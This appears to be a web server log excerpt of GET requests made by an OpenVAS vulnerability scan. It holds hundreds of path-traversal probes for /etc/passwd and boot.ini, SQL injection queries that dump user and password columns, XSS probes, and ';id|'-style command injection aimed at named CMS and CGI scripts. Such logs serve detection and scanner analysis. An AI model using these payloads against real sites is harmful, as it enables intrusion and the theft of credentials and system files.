 GET /celer/viewforum.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,GROUP_CONCAT(CONCAT(username,%200x3a,%20password,0x3a,id,0x3a,last_login)),4,5,6,7,8%20FROM%20celer_users%23
 GET /centreon/index.php
 GET /cfanywhere/index.html
 GET /cgi-bin
 GET /cgi-bin/
 GET /cgi-bin/404.php?url=1%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /cgi-bin/?lang=../../../../../../../../../etc/passwd%00.png&p_id=60
 GET /cgi-bin/?p=
 GET /cgi-bin/?upload_to=
 GET /cgi-bin/AccountSections.php/%22%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET /cgi-bin/ApplicationEngine//
 GET /cgi-bin/Config/diff.php?file=;id&new=1&old=2
 GET /cgi-bin/FormMail.pl
 GET /cgi-bin/HomePage
 GET /cgi-bin/IBSng/util/show_multistr.php?str=%3Cscript%3Ealert(/ovas-xss-test/)%3C/script%3E
 GET /cgi-bin/LightNEasy.php?do=login
 GET /cgi-bin/Login.php
 GET /cgi-bin/Login/HostLogIn.asp?ie=0
 GET /cgi-bin/Main/WebHome
 GET /cgi-bin/Mondo/lang/sys/login.aspx
 GET /cgi-bin/README.txt
 GET /cgi-bin/User-Edit.asp?UID=1%20OR%201=1
 GET /cgi-bin/_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg&picdir=Sample_Gallery&what=descriptions
 GET /cgi-bin/a_viewusers.php?s=1+UNION+SELECT+load_file(0x2f6574632f706173737764),null,null,null,null,null,null+limit+0
 GET /cgi-bin/about
 GET /cgi-bin/about-show.do
 GET /cgi-bin/add.php?lang=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/admin.php
 GET /cgi-bin/admin/
 GET /cgi-bin/admin/getparam.cgi
 GET /cgi-bin/admin/helpfiles/AdminHelp.php
 GET /cgi-bin/admin/index.php
 GET /cgi-bin/admin/index.php?page=unexisting../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/admin/lib/gradient/gradient.php?tam=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /cgi-bin/admin/login.jsp
 GET /cgi-bin/admin/login.php
 GET /cgi-bin/admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3E
 GET /cgi-bin/admin/system
 GET /cgi-bin/admin/updatelist.php?filepath=../includes/settings.php
 GET /cgi-bin/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /cgi-bin/andromeda.php
 GET /cgi-bin/animation.php?board=b&id=1">
 GET /cgi-bin/application/configs/application.ini
 GET /cgi-bin/applicationengine/
 GET /cgi-bin/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../boot.ini%00
 GET /cgi-bin/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/authLogin.cgi
 GET /cgi-bin/backend/plugin/Registration/index.php?confirm=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E 
 GET /cgi-bin/beerxml.php?r=null%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11
 GET /cgi-bin/bin/view/TWiki/WebHome
 GET /cgi-bin/bin/view/foswiki/WebHome
 GET /cgi-bin/blob.php
 GET /cgi-bin/blogs.php?tag=gamecat+
 GET /cgi-bin/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/charts.php?language=../../../../../../../../../etc/passwd%00A
 GET /cgi-bin/charts/wizard/url.php?${phpinfo()}=1
 GET /cgi-bin/city.php?hotel_city=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /cgi-bin/classifieds/Site_Admin/admin.php 
 GET /cgi-bin/cms/index.php?q=%3Cscript%3Ealert(0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374)%3C/script%3E
 GET /cgi-bin/comment.php?blog=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
 GET /cgi-bin/complete-modules/modules/forcedownload/force_download.php?filename=/etc/passwd
 GET /cgi-bin/config.xml.sav
 GET /cgi-bin/content/dynpage_load.php?file=/boot.ini
 GET /cgi-bin/content/dynpage_load.php?file=/etc/passwd
 GET /cgi-bin/core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../boot.ini%00
 GET /cgi-bin/core/includes/gfw_smarty.php?config[gfwroot]=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/cultbooking.php?lang=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/dada/mail.cgi
 GET /cgi-bin/default.aspx
 GET /cgi-bin/details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=
 GET /cgi-bin/display.php?filename=
 GET /cgi-bin/do/view/TWiki/WebHome
 GET /cgi-bin/docs/CHANGELOG
 GET /cgi-bin/docs/distribution/tour_page1.htm
 GET /cgi-bin/down.php?filename=../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/download.php?file=etc/passwd
 GET /cgi-bin/download.php?id=-1+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET /cgi-bin/download.php?id=2+AND+1=2+UNION+SELECT+1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET /cgi-bin/downloadfile.php?dwnfile=../../../../../../../../../../../../../../../etc/passwd
 GET /cgi-bin/downlot.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
 GET /cgi-bin/extra/image.php?f=../../../../../../../../../etc/passwd
 GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
 GET /cgi-bin/findagent.php?country1=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /cgi-bin/formmail.pl
 GET /cgi-bin/forum_answer.php?que_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,6,7,8,9,10/**/FROM/**/expert/*
 GET /cgi-bin/fr_left.php
 GET /cgi-bin/frontend/js.php?module=../../../../../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en
 GET /cgi-bin/gallery.php?repertoire=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/gen/obj/collectivite.class.php?path_om=/boot.ini%00
 GET /cgi-bin/gen/obj/collectivite.class.php?path_om=/etc/passwd%00
 GET /cgi-bin/general/login.php
 GET /cgi-bin/get_flash_info.php?ver=1'
 GET /cgi-bin/guestbook.php
 GET /cgi-bin/gzip_loader.php?file=../../../../../../../../../../../../../../../../etc/passwd
 GET /cgi-bin/handlers/getpage.php?id=9999999+UNION+SELECT+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7+FROM+user+LIMIT+1
 GET /cgi-bin/home.asp
 GET /cgi-bin/home.php
 GET /cgi-bin/htdocs/index.php
 GET /cgi-bin/html/index.php
 GET /cgi-bin/html/login.html
 GET /cgi-bin/inc/smarty/libs/init.php?sitepath=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=/etc/passwd
 GET /cgi-bin/includes/include.php?cct_base=../../../../../../../../../boot.ini%00
 GET /cgi-bin/includes/include.php?cct_base=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/includes/initsystem.php?loader_file=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/includes/tiny_mce/plugins/filemanager/classes/FileManager/FileSystems/ZipFileImpl.php?basepath=/etc/passwd%00
 GET /cgi-bin/includes/tiny_mce/plugins/imagemanager/config.php?basepath=/etc/passwd%00
 GET /cgi-bin/includes/window_top.php?theme_file=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.cgi
 GET /cgi-bin/index.html
 GET /cgi-bin/index.php
 GET /cgi-bin/index.php 
 GET /cgi-bin/index.php/">
 GET /cgi-bin/index.php/teachers.html?"/>
 GET /cgi-bin/index.php?../../../../../../../boot.ini
 GET /cgi-bin/index.php?../../../../../../../etc/passwd
 GET /cgi-bin/index.php??p=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?GLOBALS[SKIN]=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?OPT_Session= OpenVAS_Req
 GET /cgi-bin/index.php?PathPrefix=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?a=19&c=
 GET /cgi-bin/index.php?action=template&template=../../../../../../../../../../../../../../../../../../etc/passwd
 GET /cgi-bin/index.php?fct=preview&p=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?from=";>&help=true&page=What_is_wiki
 GET /cgi-bin/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+
 GET /cgi-bin/index.php?lng=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /cgi-bin/index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22
 GET /cgi-bin/index.php?p=../../../../../../../../../..//etc/passwd%00
 GET /cgi-bin/index.php?p=../../../../../../../../../../boot.ini%00
 GET /cgi-bin/index.php?page=../../../../../../../../../../../../../../../../boot.ini%00
 GET /cgi-bin/index.php?page=../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?page=../../../../../../../../../etc/passwd
 GET /cgi-bin/index.php?page=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?page=/etc/passwd
 GET /cgi-bin/index.php?page=1&c=&searchCart=">
 GET /cgi-bin/index.php?page=profile&id=%27%20or%20%27a%27=%27a
 GET /cgi-bin/index.php?page=viewbus&bus='
 GET /cgi-bin/index.php?pg=1&d=../../../../../../../../../../../../../../../../../../
 GET /cgi-bin/index.php?system=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?theme=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
 GET /cgi-bin/index.php?typefilter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /cgi-bin/index.phtml
 GET /cgi-bin/innoedit.cgi?download=;id|
 GET /cgi-bin/install.php?dl=/../../../../../../../../../../../../../../etc/passwd
 GET /cgi-bin/koha/help.pl?url=koha/../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00.pl
 GET /cgi-bin/kommentar.php?filecat=">&fileid=0
 GET /cgi-bin/language/en/text.php/
 GET /cgi-bin/left.php
 GET /cgi-bin/lib/browsefiles.php?dir=/etc
 GET /cgi-bin/lib/browsefolders.php?dir=/etc
 GET /cgi-bin/library/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php/%27%3E%3Cscript%3Ealert(/openvas-xss-test/);%3C/script%3E
 GET /cgi-bin/library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../boot.ini%00
 GET /cgi-bin/library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/listserv/wa.exe?SHOWTPL=
 GET /cgi-bin/loader-wizard.php?page=phpinfo
 GET /cgi-bin/login
 GET /cgi-bin/login.cgi
 GET /cgi-bin/login.html
 GET /cgi-bin/login.php
 GET /cgi-bin/login.pl
 GET /cgi-bin/login.wdm.
 GET /cgi-bin/login/login.php?sessID=
 GET /cgi-bin/main.php
 GET /cgi-bin/manager/index.php
 GET /cgi-bin/mapserv?map=
 GET /cgi-bin/medialist.php
 GET /cgi-bin/message.php?skin=">
 GET /cgi-bin/moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /cgi-bin/mod.php?mod=publisher&op=allmedia&artid=-1%20union%20select%200x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET /cgi-bin/module/forum/main.php?website=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/news.php4?nid=-12'+union+select+1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*
 GET /cgi-bin/news.php?wgo=666+and+1=2+union+all+select+0,1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8--
 GET /cgi-bin/news/index.php
 GET /cgi-bin/nowosci.php?a=1&str=%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /cgi-bin/obm.php
 GET /cgi-bin/oc-admin/index.php
 GET /cgi-bin/oldnews_reader.php?lang=../../../../../../../../../../../../../../../boot.ini%00 
 GET /cgi-bin/oldnews_reader.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 
 GET /cgi-bin/openBrowser.php?url="onload="alert(/openvas-xss-test/)
 GET /cgi-bin/page.php?id='
 GET /cgi-bin/page.php?page=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/photo.php?id=-9999/**/union/**/select/**/1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET /cgi-bin/photo/templates/admin_default/confirm.tpl.php?nsextt=">
 GET /cgi-bin/pivot/index.php
 GET /cgi-bin/pivotx/modules/module_image.php?image=
 GET /cgi-bin/plugin/themes/default/page_forgot.php?apps_path[themes]=/etc/passwd%00
 GET /cgi-bin/plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
 GET /cgi-bin/portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /cgi-bin/post.php?newsgroups=
 GET /cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
 GET /cgi-bin/print.php?page=../../../../../../../../../etc/passwd
 GET /cgi-bin/prodpage.cfm?CFID=&CFTOKEN=&CategoryID='openvas
 GET /cgi-bin/productionnu2/fileuploader.php?dir=../../../../../../../../../../../boot.ini%00
 GET /cgi-bin/productionnu2/fileuploader.php?dir=../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/productionnu2/report.php?StartingDirectory=../../../../../../../../../../../boot.ini%00
 GET /cgi-bin/productionnu2/report.php?StartingDirectory=../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/profile/index.php
 GET /cgi-bin/report.php?img_id=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E
 GET /cgi-bin/research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,null,null,null
 GET /cgi-bin/ress.php?page=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/restore_config.cgi
 GET /cgi-bin/revert.php?rev=%3Cscript%3Ealert(%27OpenVAS-XSS-Test%27)%3C/script%3E
 GET /cgi-bin/run-cvstrac//index
 GET /cgi-bin/samples/index.html
 GET /cgi-bin/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../boot.ini%00
 GET /cgi-bin/scr/soustab.php?dsn[phptype]=../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/search.php3?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET /cgi-bin/search.php?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET /cgi-bin/search.php?q=
 GET /cgi-bin/search.php?s=%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /cgi-bin/search.php?words=%25%27/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/1%2CCONCAT%28%27%3C1%3E%27%2Cname%2C%27%3A%27%2Cpassword%2C%27%3C2%3E%27%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10/%2A%2A/FROM/%2A%2A/site_administrators/%2A%2A/%23 
 GET /cgi-bin/searchresults.php?SearchTerm=">&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14
 GET /cgi-bin/server.php
 GET /cgi-bin/show_profile.php?custid=1+and+1=0+union+select+1,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 
 GET /cgi-bin/signin.php
 GET /cgi-bin/site/login.php
 GET /cgi-bin/sitemap.php?id_site=
 GET /cgi-bin/smarty.php?cwd=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/spip.php
 GET /cgi-bin/ssi.cgi/title.ssi
 GET /cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 GET /cgi-bin/star57.cgi?download=;id|
 GET /cgi-bin/status
 GET /cgi-bin/sublink.php?langval=/etc/passwd
 GET /cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/passwd
 GET /cgi-bin/system/admin/modules.php?install=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/team.rc5-72.php?showlang=../../../../../../../../../etc/passwd%00
 GET /cgi-bin/test-cgi.bat?|echo
 GET /cgi-bin/test/files.xml?action=download&file=/../../wikka.config.php
 GET /cgi-bin/themes/admin/default/modules/show.php?file=/boot.ini
 GET /cgi-bin/themes/admin/default/modules/show.php?file=/etc/passwd
 GET /cgi-bin/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvas-xss-test/%29;%3C/script%3E
 GET /cgi-bin/ticketview.php?email=%22%3E%3Cscript%3Ealert(/openvas-xss-test/)%3C/script%3E&id=1
 GET /cgi-bin/tiki-index.php
 GET /cgi-bin/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../boot.ini%00
 GET /cgi-bin/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../etc/passwd%00
 GET /cgi-bin/title.html
 GET /cgi-bin/titleBar.php
 GET /cgi-bin/top.cgi
 GET /cgi-bin/update.php
 GET /cgi-bin/upload/account-login.php
 GET /cgi-bin/upload/index.php
 GET /cgi-bin/users/login.php
 GET /cgi-bin/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00
 GET /cgi-bin/utility/TagSelector.aspx?TagEditor=%27)%3C/script%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /cgi-bin/vhosts/ehcp/?op=applyforaccount
 GET /cgi-bin/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00
 GET /cgi-bin/viewfaqs.php?cat=-1+union+select+1
 GET /cgi-bin/viewheadline.php?id=-9%27%20union%20select%201,2,3,4,5,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20wp_users--+
 GET /cgi-bin/viewstory.php?id=-8+and+1=1+union+select+0,1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4
 GET /cgi-bin/vmtadmin.cgi?callType=ACTION&actionType=VERSIONS
 GET /cgi-bin/wa.exe?SHOWTPL=
 GET /cgi-bin/web/?wicket:bookmarkablePage=:org.geoserver.web.AboutGeoServerPage
 GET /cgi-bin/web/help.php
 GET /cgi-bin/webacc?User.interface=/../webacc/wml
 GET /cgi-bin/webapp/home.html?0
 GET /cgi-bin/welcome.do
 GET /cgi-bin/wiki/index.php
 GET /cgi-bin/windows/function.php?file=/etc/passwd&start=0&end=10
 GET /cgi-bin/wizard/index.php?type=';phpinfo();//
 GET /cgi-bin/wrx.cgi
 GET /cgi-bin/wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
 GET /cgi-bin/www/admin/index.php
 GET /cgi-bin/www/index.php
 GET /cgi-bin/www/loader.php/system/">
 GET /cgi-bin/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=%27
 GET /cgi-bin/zp-core/admin.php?a="><script>alert(/openvas-xss-test/)</script>
 GET /cgi-binadmin/login.php
 GET /cgi-bindefault.aspx
 GET /cgi-local/eshop.pl/seite=;cat%20eshop.pl|
 GET /cgi-local/shop.pl/page=;cat%20shop.pl|
 GET /cgi-mod/index.cgi
 GET /cgi_local/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
 GET /cgiirc/irc.cgi
 GET /cgit/
 GET /chamilo/index.php
 GET /charts/charts/wizard/url.php?${phpinfo()}=1
 GET /charts/wizard/index.php?type=';phpinfo();//
 GET /chassis/config/GeneralChassisConfig.html
 GET /chat/home.asp
 GET /chat/index.html
 GET /chat/index.php
 GET /chipmunk/index.php
 GET /cilemhaber/www/default.asp
 GET /citrix/nfuse/default/login.asp?NFuse_LogoutId=&NFuse_MessageType=Error&NFuse_Message=&ClientDetection=ON
 GET /ckeditor/samples/index.html
 GET /claroline/claroline/install/index.php
 GET /classified/adverts.php?category_id=5%20UNION%20ALL%20SELECT%201,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10
 GET /clearsite/about.php
 GET /clicknet/index.php
 GET /clicknetcms/index.php
 GET /cmf/login
 GET /cmf/manager/index.php
 GET /cms/
 GET /cms/?lang=../../../../../../../../../etc/passwd%00.png&p_id=60
 GET /cms/?p=
 GET /cms/Templates/default/index_logged.php?main_loaded=1&cur_module=/etc/passwd
 GET /cms/admin/index.php
 GET /cms/admin/login.php
 GET /cms/admin/system
 GET /cms/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /cms/cms/?npage=-1&content_dir=/etc/passwd%00
 GET /cms/cms/index.php?q=%3Cscript%3Ealert(0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374)%3C/script%3E
 GET /cms/complete-modules/modules/forcedownload/force_download.php?filename=/etc/passwd
 GET /cms/content/dynpage_load.php?file=/boot.ini
 GET /cms/content/dynpage_load.php?file=/etc/passwd
 GET /cms/data/nanoadmin.php
 GET /cms/downloadfile.php?dwnfile=../../../../../../../../../../../../../../../etc/passwd
 GET /cms/extra/image.php?f=../../../../../../../../../etc/passwd
 GET /cms/front_content.php
 GET /cms/inc/smarty/libs/init.php?sitepath=../../../../../../../../../etc/passwd%00
 GET /cms/includes/window_top.php?theme_file=../../../../../../../../../etc/passwd%00
 GET /cms/indeks.php?db=frontpage
 GET /cms/index.php
 GET /cms/index.php/">
 GET /cms/index.php/teachers.html?"/>
 GET /cms/index.php?../../../../../../../boot.ini
 GET /cms/index.php?../../../../../../../etc/passwd
 GET /cms/index.php??p=../../../../../../../../../etc/passwd%00
 GET /cms/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET /cms/index.php?id=-1'%20UNION%20SELECT%201,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9,10,11,12,13--+
 GET /cms/index.php?lng=../../../../../../../../../etc/passwd%00
 GET /cms/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /cms/index.php?option=com_search&searchword=xss&ordering=%22%20onmouseover=alert(document.cookie)%20style=position:fixed;top:0;left:0;width:100%;height:100%;%22
 GET /cms/index.php?page=../../../../../../../../../../../../../../../../boot.ini%00
 GET /cms/index.php?page=../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cms/index.php?page=../../../../../../../../../etc/passwd
 GET /cms/index.php?page=../../../../../../../../../etc/passwd%00
 GET /cms/index.php?s=blog&m=permalink&x=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 GET /cms/index.php?system=../../../../../../../../../etc/passwd%00
 GET /cms/index.php?theme=../../../../../../../../../etc/passwd%00
 GET /cms/manager/index.php
 GET /cms/module/forum/main.php?website=../../../../../../../../../etc/passwd%00
 GET /cms/modules/profile/user.php?aXconf[default_language]=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cms/news/index.php
 GET /cms/oldnews_reader.php?lang=../../../../../../../../../../../../../../../boot.ini%00 
 GET /cms/oldnews_reader.php?lang=../../../../../../../../../../../../../../../etc/passwd%00 
 GET /cms/openBrowser.php?url="onload="alert(/openvas-xss-test/)
 GET /cms/photo/templates/admin_default/confirm.tpl.php?nsextt=">
 GET /cms/print.php?page=../../../../../../../../../etc/passwd
 GET /cms/ress.php?page=../../../../../../../../../etc/passwd%00
 GET /cms/search.php3?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET /cms/search.php?bn=%3Cbody%20onload=alert(%27openvas-xss-test%27)%3E
 GET /cms/sitemap.php?id_site=
 GET /cms/smarty.php?cwd=../../../../../../../../../etc/passwd%00
 GET /cms/system/admin/modules.php?install=../../../../../../../../../etc/passwd%00
 GET /cms/system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374;
 GET /cms/themes/admin/default/modules/show.php?file=/boot.ini
 GET /cms/themes/admin/default/modules/show.php?file=/etc/passwd
 GET /cms/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../boot.ini%00
 GET /cms/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../etc/passwd%00
 GET /cms/update.php
 GET /cms/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00
 GET /cms/view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9
 GET /cms/www/loader.php/system/">
 GET /cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../boot.ini%00
 GET /cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../../../../../../etc/passwd%00
 GET /cmum/index.php
 GET /cncms/index.php
 GET /coldcal/index.cfm
 GET /coldusr/index.cfm
 GET /collabtive/index.php
 GET /college/includes/tiny_mce/plugins/imagemanager/config.php?basepath=/etc/passwd%00
 GET /comersus/backofficeLite/comersus_backoffice_install10.asp
 GET /cometchat//index.html
 GET /comic/news.php?news_id=4+union+all+select+0,1,2,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374
 GET /commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm
 GET /community/index.php
 GET /compactcms/afdrukken.php?page=%22%3E%3Cscript%3Ealert(%27openvas-xss-test%27)%3C/script%3E
 GET /comparisonengine/product.comparision.php?cat=null%20union%20all%20select%201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%20from%20daype_users_tb%20--&name=GSM
 GET /conference/roschedule.php
 GET /config/global.conf
 GET /configurations.do
 GET /console/faces/jsp/login/BeginLogin.jsp
 GET /contao/index.php/teachers.html?"/>
 GET /content/nonexistant186919506019694075572059892597.mp3
 GET /continuum/about.action
 GET /control/uk/publish/category
 GET /coppermine/index.php
 GET /coupon/index.php?page=viewbus&bus='
 GET /coursems/download_file.php?path=../../../../../../../../../../../../../../../../../../etc/passwd%00
 GET /cp/index.php
 GET /cpassman/index.php
 GET /cpqlogin.htm?RedirectUrl=/&RedirectQueryString=
 GET /crawltrack/html/infoen.htm
 GET /cre/index.php
 GET /creasito/index.php
 GET /crowd/services
 GET /crypt/cryptographp.inc.php?cfg=verifier.php&sn=PHPSESSID&
 GET /cscart/index.php
 GET /cubecart/index.php
 GET /cultbooking/cultbooking.php?lang=../../../../../../../../../etc/passwd%00
 GET /cutenews/index.php
 GET /cw/admin/helpfiles/AdminHelp.php
 GET /d/
 GET /dagger/skins/default.php?dir_inc=/etc/passwd%00
 GET /dasBlog/Login.aspx
 GET /dasdec/dasdec.csp
 GET /database/_sessions/
 GET /dbase/aeNovo1.mdb
 GET /dc/includes/tiny_mce/plugins/imagemanager/config.php?basepath=/etc/passwd%00
 GET /dealers/index.php
 GET /default.asp
 GET /default.aspx
 GET /demium/urheber.php?name=../../../../../../../../../../etc/passwd%00
 GET /demo/demo/phpThumb.demo.demo.php
 GET /demo/index.php
 GET /desknow/index.html
 GET /dev/save_restore.xml
 GET /devana/index.php
 GET /diary/default.asp  
 GET /dienstplan/?page=login&action=about
 GET /dir/admin/index.php
 GET /discloser/login.php
 GET /discuz/index.php
 GET /diycms/diy/index.php
 GET /dl_stats/download.php?id=2+AND+1=2+UNION+SELECT+1,2,3,4,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--
 GET /dlg/cart/index.php?page=1&c=&searchCart=">
 GET /dlguard/cart//index.php?page=1&c=&searchCart=">
 GET /dm-filemanager/login.php
 GET /dmf/login.php
 GET /dms/login.php
 GET /dms/slideshow.kspx?source=
 GET /dn/library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../boot.ini%00
 GET /dn/library/lib.menu.php?rootpath=../../../../../../../../../../../../../../../etc/passwd%00
